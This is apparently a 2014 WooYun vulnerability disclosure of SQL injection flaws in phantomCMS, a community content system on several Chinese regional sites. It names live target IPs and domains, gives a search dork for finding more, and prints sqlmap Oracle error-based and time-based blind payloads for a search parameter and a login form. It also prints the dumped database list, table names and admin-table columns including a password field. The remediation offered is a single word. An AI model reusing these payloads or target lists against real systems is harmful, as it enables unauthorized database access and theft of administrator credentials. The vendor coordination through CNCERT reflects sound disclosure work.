当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057079

漏洞标题:某增值电信业务通用系统多处SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: xfkxfk

提交时间:2014-04-16 18:06

修复时间:2014-07-15 18:07

公开时间:2014-07-15 18:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-16: 细节已通知厂商并且等待厂商处理中
2014-04-21: 厂商已经确认,细节仅向厂商公开
2014-04-24: 细节向第三方安全合作伙伴开放
2014-06-15: 细节向核心白帽子及相关领域专家公开
2014-06-25: 细节向普通白帽子公开
2014-07-05: 细节向实习白帽子公开
2014-07-15: 细节向公众公开

简要描述:

增值电信业务中,某通用系统存在多处SQL注入。

详细说明:

增值电信业务中,某社区类CMS,phantomCMS,是江苏鸿信系统集成有限公司的一套管理系统,此系统多省市再也,存在多出SQL注入,可被脱裤。
Google关键字:inurl:phantomCMS
http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2
http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2
http://222.92.198.27/phantomCMS/toSqwz.action?sid=2
http://www.liuxiang.gov.cn/phantomCMS/toSqwz.action?sid=
第一处SQL注入:
拿http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2为例:
在搜索处存在SQL注入,如下:
http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123%25%27

---
Place: GET
Parameter: searStr
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: sid=2&searStr=123') AND 2424=(SELECT UPPER(XMLType(CHR(60)||CHR(58)
||CHR(113)||CHR(115)||CHR(105)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (2424=242
4) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(106)||CHR(101)||CHR(11
3)||CHR(62))) FROM DUAL) AND ('udbt'='udbt
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (comment)
Payload: sid=2&searStr=123') AND 1642=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR
(80)||CHR(82)||CHR(85),5)--
---
[22:06:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


第二处SQL注入:
拿http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2为例:
在登录处存在SQL注入,如下:
连接:http://www.jssqw.net/ynlUserLogin.action
POST:fromIndex=yes&loginBean.communityAccount=111&loginBean.cummunityUserAccount=111&loginBean.password=111&Submit=%E6%8F%90%E4%BA%A4

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: loginBean.communityAccount
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fromIndex=yes&loginBean.communityAccount=111' AND 8484=DBMS_PIPE.RE
CEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(102)||CHR(121),5) AND 'eogz'='eogz&loginBe
an.cummunityUserAccount=111&loginBean.password=111&Submit=%E6%8F%90%E4%BA%A4
---
[22:08:23] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

漏洞证明:

第一处SQL注入:
http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123
跑出的数据库信息如下:

available databases [29]:
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GL_CMS61
[*] GL_FORUM61
[*] GL_INTER61
[*] GL_OLDPRINT
[*] GL_SQ61
[*] HR
[*] IX
[*] LIXIANG
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SQ
[*] SQELIST
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


数据库CMS的内容:

Database: CMS
[42 tables]
+-----------------------------+
| CMS_ARTICLE |
| CMS_ARTICLE_CONTENT |
| CMS_ARTICLE_PICTURE |
| CMS_ARTICLE_RECORD |
| CMS_CHANNEL |
| CMS_CLICK_RATE_DETAIL |
| CMS_DICTIONARY |
| CMS_FLOAT_PICTURE |
| CMS_INFO_SHARE_CIRCLE |
| CMS_INFO_SHARE_CIRCLE_SITE |
| CMS_LOCALITY_POLICE |
| CMS_MONTH_STAR |
| CMS_ORGANIZATION_SITE |
| CMS_PICTURE |
| CMS_POLICE_REPORT |
| CMS_POLICE_SERVICE |
| CMS_REFERENCE |
| CMS_SITE |
| CMS_SITE_ADMIN |
| CMS_SITE_LINK |
| CMS_SITE_PICTURE |
| CMS_SITE_ROLE |
| CMS_STOPWORD |
| CMS_TEMPLATE |
| CMS_TEMPLATE_SCENARIO |
| CMS_TEMPLATE_TYPE |
| CMS_THEMATIC |
| CMS_THEMATIC_ARTICLE |
| CMS_THEMATIC_CHANNEL |
| P_ADMIN |
| P_ADMIN_ROLE |
| P_FUNCTION |
| P_LOAD_INFORMATION |
| P_MODULE |
| P_ORGANIZATION |
| P_ROLE |
| P_ROLE_FUNCTION |
| P_ROLE_MODULE |
| SYS_OPERATION_LOG |
| SYS_PARAMETER |
| SYS_SELECT_PARAMETER |
| SYS_SELECT_PARAMETER_DETAIL |
+-----------------------------+


Database: CMS
Table: P_ADMIN
[9 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| PA_ACCOUNT | VARCHAR2 |
| PA_ADDRESS | VARCHAR2 |
| PA_EMAIL | VARCHAR2 |
| PA_ID | NUMBER |
| PA_NAME | VARCHAR2 |
| PA_PASSWORD | VARCHAR2 |
| PA_PHONE | VARCHAR2 |
| PA_STATE | NUMBER |
| PA_TYPE | NUMBER |
+-------------+----------+

修复方案:

过滤

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-21 10:24

厂商回复:

CNVD确认并在多个实例上复现所述情况,根据测试情况,已经转由CNCERT下发给江苏分中心,要求江苏分中心协调软件生产厂商处置。

最新状态:

暂无


漏洞评价:

评论